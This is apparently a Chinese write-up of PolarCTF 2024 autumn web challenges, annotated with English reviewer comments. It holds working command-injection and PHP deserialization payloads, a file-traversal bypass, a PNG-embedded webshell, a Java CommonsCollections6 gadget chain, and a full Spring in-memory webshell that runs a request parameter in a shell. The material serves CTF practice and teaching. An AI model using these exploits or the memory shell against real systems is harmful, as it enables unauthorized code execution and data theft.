【Web】PolarCTF2024秋季个人挑战赛wp

EZ_Host

一眼丁真命令注入

 payload:

?host=127.0.0.1;cat+f*

序列一下

exp:

<?php

// Stub mirroring the target's Polar class; only the class name and the
// property names/visibility matter for the serialized form produced below.
class Polar{
    public $lt;
    public $b;
}
// NOTE(review): the target code that consumes this object is not shown on the
// page; the values chosen ("system" / "tac /f*") presumably end up as a
// callable name and its argument once the object is unserialized — confirm
// against the target source.
$p=new Polar();
$p->lt="system";
$p->b="tac /f*";
// Emits the O:5:"Polar":2:{...} string used as the x= parameter below.
echo serialize($p);

payload:

x=O:5:"Polar":2:{s:2:"lt";s:6:"system";s:1:"b";s:7:"tac /f*";}

vm50给你flag

先读waf源码

?file=php://filter/convert.base64-encode/resource=funs.php

base64解码

<?php
include 'f1@g.php';
// Blocklist filter on user-supplied data (presumably the value later handed to
// unserialize(); the call site is not on the page). Rejects only input that
// contains the literal substring "f1@g", case-insensitively; everything else
// passes. Returns FALSE (after echoing a message) on a match, TRUE otherwise.
// NOTE(review): a single-literal blocklist is not a meaningful control for data
// that is later unserialized — the payload shown further down never contains
// "f1@g" at all. Not unserializing user input (or restricting classes via
// unserialize()'s allowed_classes option) is the actual fix.
function myWaf($data)
{
    if (preg_match("/f1@g/i", $data)) {
        echo "NONONONON0!";
        return FALSE;
    } else {
        return TRUE;
    }
}

class A
{
    private $a;

    // Destructor: runs when the object is destroyed. String-concatenating
    // $this->a invokes __toString() if an object is stored there, which is
    // the entry point of the chain (A#__destruct -> B#__toString -> C#__get).
    public function __destruct()
    {
        echo "A->" . $this->a . "destruct!";
    }
}

class B
{
    private $b = array();
    // Reached via string conversion of a B instance. Indexes $this->b['kfc']
    // and reads a property named vm50 from it; when that element is an object
    // with no such property, its __get() hook is invoked instead.
    public function __toString()
    {
        $str_array= $this->b;
        $str2 = $str_array['kfc']->vm50;
        return "Crazy Thursday".$str2;
    }
}
class C{
    private $c = array();
    // Property-read hook: $kfc is the missing property name ("vm50" above).
    // Looks up $this->c[$kfc] and uses the result as a *variable name* ($$f),
    // so the array value selects which variable in this scope is dumped;
    // `global $flag` makes $flag one of the candidates. Because $c comes from
    // the unserialized object, var_dump($$f) is the disclosure sink here.
    // The hook returns nothing, so B#__toString concatenates NULL.
    public function __get($kfc){
        global $flag;
        $f = $this->c[$kfc];
        var_dump($$f);
    }
}

exp:

<?php

// Stubs mirroring the target classes, with the properties made public so the
// property names serialize unmangled.
// NOTE(review): the target declares $a, $b and $c as private; private
// properties serialize under a name-mangled key, so whether the public form
// shown here lands in the intended slot depends on unserialize() behaviour in
// the target's PHP version — confirm.
class A
{
    public $a;
}

class B
{
    public $b;
}
class C{
    public $c;
}

//A#__destruct -> B#__toString -> C#__get
// C#__get maps "vm50" -> "flag", so $$f in the target resolves to $flag.
$c=new C();
$b=new B();
$a=new A();
$c->c=array("vm50"=>"flag");
$b->b=array("kfc"=>$c);
$a->a=$b;
echo serialize($a);

payload:

O:1:"A":1:{s:1:"a";O:1:"B":1:{s:1:"b";a:1:{s:3:"kfc";O:1:"C":1:{s:1:"c";a:1:{s:4:"vm50";s:4:"flag";}}}}}

Deserialize 

访问./hidden

访问./hidden/hidden.php 

exp

<?php

// Stubs of the target's Token / User / Product classes (the target source is
// not reproduced on the page).
class Token {
    public $id;
    public $secret;
    // NOTE(review): $product is assigned further down without being declared
    // here, so it becomes a dynamic property (deprecated since PHP 8.2). It
    // still serializes as the third Token field, matching the payload below.
}

class User {
    public $name;
    public $isAdmin = false;
    public $token;
}

class Product {
    public $productName;
    public $price;
}

$c=new Product();
$b=new Token();
$a=new User();
$c->productName='1';
$c->price=1;
// Dynamic property — see the note on class Token.
$b->product=$c;
$b->id=1;
$a->name="Z3r4y";
$a->token=$b;
// The flag the target presumably checks; $secret is left NULL (serializes as N;).
$a->isAdmin=true;
echo serialize($a);

 payload:

./hidden/hidden.php?data=O:4:"User":3:{s:4:"name";s:5:"Z3r4y";s:7:"isAdmin";b:1;s:5:"token";O:5:"Token":3:{s:2:"id";i:1;s:6:"secret";N;s:7:"product";O:7:"Product":2:{s:11:"productName";s:1:"1";s:5:"price";i:1;}}}

 

 

传马

上传一个png文件抓包改php后缀

访问传的马,RCE

bllbl_ser1

一开始给了php代码

exp:

<?php
// Stubs of the two target classes given with the challenge (not reproduced
// on the page).
class bllbl
{
    public $qiang;// "my strength"
}
class bllnbnl{
    public $er;// "my son"
}

$b=new bllbl();
$a=new bllnbnl();
// The value of $er is PHP source text; how the target consumes it is not
// shown here.
$a->er="system('cat /f*');";
$b->qiang=$a;
echo serialize($b);

payload:

?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:18:"system('cat /f*');";}}

 

投喂

 exp:

<?php
// Stub of the target's User class; $username is left NULL (serializes as N;)
// and only is_admin is set.
class User
{
    public $username;
    public $is_admin;
}

$a=new User();
$a->is_admin=true;
echo serialize($a);

payload:

data=O:4:"User":2:{s:8:"username";N;s:8:"is_admin";b:1;}

raoyiquan

payload:

?c.md=env

读环境变量偷鸡成功 

 

但交了不对()

老老实实绕吧

payload:

?c.md=ta\c /fl\ag.php

1ncIud3

扫出来

?page=flag 对应 ./flag.php,文件后缀被写死为 php

经过测试发现题目会将 ../ 替换为空,双写即可绕过,实现目录穿越

?page=..././..././..././..././..././..././..././..././f14g

尝试爆破没结果

import requests
import itertools

# 定义字符和替换的映射,包括 F 大写和 g 替换成 9 的情况
# Map each replaceable character to its candidate substitutions (leet-style
# variants; also covers upper-case F and g -> 9).
replace_dict: dict[str, list[str]] = {
    'l': ['1', 'I', 'L', 'l'],
    'a': ['3', '4', 'a', '@'],
    'F': ['F', 'f'],
    'g': ['g', '9']
}

# Base name whose characters get substituted.
original_string: str = "Flag"

# (index, char) for every character that has substitutions (all four here).
positions: list[tuple[int, str]] = [(i, char) for i, char in enumerate(original_string) if char in replace_dict]

# Cartesian product of the candidate lists -> every variant of the base name.
possible_combinations: list[str] = []
for combination in itertools.product(*[replace_dict[char] for _, char in positions]):
    temp_string = list(original_string)
    for (pos, _), replacement in zip(positions, combination):
        temp_string[pos] = replacement
    possible_combinations.append("".join(temp_string))

# URL template for the single challenge instance; {} receives the variant.
# The ..././ segments are the doubled-up traversal described in the text above.
base_url: str = "http://472bb567-85eb-4d41-b194-77ec77dd844e.www.polarctf.com:8090/?page=..././..././..././..././..././..././..././..././{}"

# Request each variant and report responses that mention "flag".
for variant in possible_combinations:
    # Substitute the variant into the URL
    url = base_url.format(variant)
    
    try:
        # Send the GET request. NOTE(review): no timeout is passed, so a
        # stalled connection blocks the loop indefinitely.
        response = requests.get(url)
        
        # Check whether the response body contains "flag"
        if "flag" in response.text.lower():
            print(f"Found 'flag' in the response for variant: {variant}")
            print(f"Response Content:\n{response.text[:100]}")  # first 100 characters
            print("-" * 80)  # separator
        
    except Exception as e:
        # Catch-all: connection errors and everything else are only printed, so
        # a variant that failed to connect looks the same as one that was not found.
        print(f"Error with variant {variant}: {e}")

 后面发现是,鉴定为傻逼题

?page=..././..././f1a9

 

笑傲上传

 

有一个后门

一句话木马插在准备好的图片末尾

cat yjh3.php >> 1.png

上传成功 

 

文件包含RCE 

/include.php?file=/var/www/html/upload/5420240921110122.png

 

SnakeYaml 

不出网打hex

SnakeYaml反序列化分析 - F12~ - 博客园 

自己也写过对应的文章,把fastjson换成snakeyaml就行【Web】浅聊Java反序列化之C3P0——不出网Hex字节码加载利用-CSDN博客 

CC6打spring内存马

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Builds a CommonsCollections6-style serialized object (written to ./cc6.bin)
 * whose TemplatesImpl payload carries the SpringControllerMemShell3 class bytes.
 *
 * Reviewer notes (defensive): the stream produced here is exactly what an
 * ObjectInputFilter (JEP 290) allowlist or an allowlisting deserialization
 * layer should reject — TemplatesImpl, InvokerTransformer and LazyMap inside an
 * incoming stream are well-known markers. The serialize()/unserialize()
 * helpers never close their streams, and unserialize() performs an
 * unrestricted readObject().
 */
public class CC6WithTp {
    public static void main(String[] args) throws Exception {
        // TemplatesImpl is populated reflectively: _bytecodes holds the class
        // file that is defined and instantiated when newTransformer() runs;
        // _name and _tfactory must be non-null for that code path to proceed.
        TemplatesImpl templates = new TemplatesImpl();
        Class ct = templates.getClass();
        byte[] code = Files.readAllBytes(Paths.get("C:\\Users\\21135\\Desktop\\JeecgBoot-master\\polar\\target\\classes\\exp\\SpringControllerMemShell3.class"));
        byte[][] bytes = {code};
        Field ctDeclaredField = ct.getDeclaredField("_bytecodes");
        ctDeclaredField.setAccessible(true);
        ctDeclaredField.set(templates,bytes);
        Field nameField = ct.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"Z3");
        Field tfactory = ct.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());


        // Chain: ConstantTransformer(templates) -> InvokerTransformer("newTransformer").
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null,null)
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);

        // The LazyMap is first decorated with a harmless ConstantTransformer(1)
        // so nothing fires while the object graph is assembled locally.
        Map<Object,Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
//
//        // see the TiedMapEntry constructor: the key and value passed in
        HashMap<Object, Object> map1 = new HashMap<>();
//        // The entry must be put() into a HashMap: on readObject the HashMap
//        // rehashes its keys, TiedMapEntry.hashCode() calls LazyMap.get(), and
//        // LazyMap runs its factory transformer when the key is absent.
        map1.put(tiedMapEntry, "bbb");
        // put() above already called LazyMap.get("aaa") and stored 1 under that
        // key; remove it so the lookup is lazy again at deserialization time.
        lazyMap.remove("aaa");

        // Only now swap the real chain in as the factory, via reflection, so the
        // local put() above did not trigger it.
        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,chainedTransformer);

//
        // NOTE(review): this serialization into a byte array is never used and
        // its stream is never closed; the file written by serialize() below is
        // the actual output.
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(map1);

        serialize(map1);
    }

    /**
     * Writes obj to ./cc6.bin in the working directory.
     * NOTE(review): the stream is never closed or flushed explicitly (no
     * try-with-resources), so the file relies on JVM exit to be complete.
     */
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("./cc6.bin"));
        objectOutputStream.writeObject(obj);
    }
    /**
     * Reads one object back from filename with an unrestricted readObject().
     * NOTE(review): this is the sink the chain above targets; production code
     * should install an ObjectInputFilter allowlist before calling readObject().
     * The stream is never closed.
     */
    public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        Object object = objectInputStream.readObject();
        return object;
    }
}

内存马

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;

/**
 * Works in SpringMVC+Tomcat environments as well as Spring Boot 2.x,
 *   and is therefore more general than SpringControllerMemShell.java.
 *   Spring Boot 1.x and 3.x were not tested.
 *
 * Reviewer notes (defensive): this class is the TemplatesImpl payload loaded by
 * CC6WithTp. Its no-arg constructor runs when the translet is instantiated and
 * registers a new request mapping ("/malicious") directly in the running
 * RequestMappingHandlerMapping — nothing is written to disk, which is what
 * makes it a "memory shell". Indicators for defenders: a handler in
 * RequestMappingHandlerMapping.getHandlerMethods() whose class belongs to no
 * deployed controller, shell child processes (/bin/sh -c, cmd.exe /c) spawned by
 * the application-server JVM, and requests carrying a `cmd` parameter to an
 * otherwise unknown path. Both catch blocks swallow every exception, so a failed
 * registration or command leaves no log entry.
 */
@Controller
public class SpringControllerMemShell3 extends AbstractTranslet {

    public SpringControllerMemShell3() {
        try {
            // The DispatcherServlet's WebApplicationContext is taken from the
            // current request's attributes, so this presumably only succeeds
            // while a request is bound to the calling thread.
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
            RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
            Method method2 = SpringControllerMemShell3.class.getMethod("test");
            RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition(); // unused

            // getMappingForMethod is non-public (hence setAccessible); it builds
            // the RequestMappingInfo from the @RequestMapping annotation on test().
            Method getMappingForMethod = mappingHandlerMapping.getClass().getDeclaredMethod("getMappingForMethod", Method.class, Class.class);
            getMappingForMethod.setAccessible(true);
            RequestMappingInfo info =
                    (RequestMappingInfo) getMappingForMethod.invoke(mappingHandlerMapping, method2, SpringControllerMemShell3.class);

            // The String constructor below is a no-op, so the instance that gets
            // registered does not re-run this registration logic.
            SpringControllerMemShell3 springControllerMemShell = new SpringControllerMemShell3("aaa");
            mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
        } catch (Exception e) {
            // NOTE(review): swallowed — failures are completely silent.
        }
    }

    // Translet hooks required by AbstractTranslet; intentionally empty because
    // the class is never used as an actual XSLT translet.
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    // No-op constructor used for the instance that is actually registered.
    public SpringControllerMemShell3(String aaa) {
    }

    // Handler bound at runtime by the no-arg constructor: passes the `cmd`
    // request parameter to the platform shell and writes its stdout to the
    // response; responds 404 when the parameter is absent.
    @RequestMapping("/malicious")
    public void test() throws IOException {
        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
        try {
            String arg0 = request.getParameter("cmd");
            PrintWriter writer = response.getWriter();
            if (arg0 != null) {
                String o = "";
                ProcessBuilder p;
                // OS-dependent shell selection; the parameter is passed through
                // unmodified as the shell's -c / /c argument.
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                } else {
                    p = new ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});
                }
                // "\\A" delimiter makes the Scanner consume the whole stdout as one token.
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next() : o;
                c.close();
                writer.write(o);
                writer.flush();
                writer.close();
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {
            // NOTE(review): swallowed — errors are not surfaced or logged.
        }
    }
}

payload:

data=!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource%0AuserOverridesAsString%3A%20HexAsciiSerializedMap
